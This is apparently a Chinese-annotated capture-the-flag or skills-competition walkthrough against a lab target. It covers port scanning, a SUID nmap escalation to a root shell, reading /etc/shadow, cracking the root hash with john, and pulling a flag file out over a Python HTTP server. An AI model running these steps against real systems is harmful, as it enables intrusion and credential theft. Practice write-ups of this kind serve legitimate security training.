nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析
flag: 22/tcp
uname -a # 输出操作系统信息
flag: Kiowizity
uname -a # 输出操作系统信息
flag: 3.13.0-45-generic
ls /root
cat /root/adftutij.txt
flag: hyjufk983
find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件
nmap --interactive # 进入nmap交互模式
!sh # 执行sh
id # 查看id
cat /etc/shadow # shadow 文件保存密码
vim hash # 把root信息行写入进去
cat hash # 查看是否赋值成功
john hash # 破解hash
flag: 0987654321
pwd # 查看当前目录
copy /root/flag.jpg flag.jpg # 复制过来
python -m SimpleHTTPServer 8080 # 在8080端口开启一个HTTP服务
注意一定要加:8080 指定HTTP端口
flag: 2022_year_Skill_competition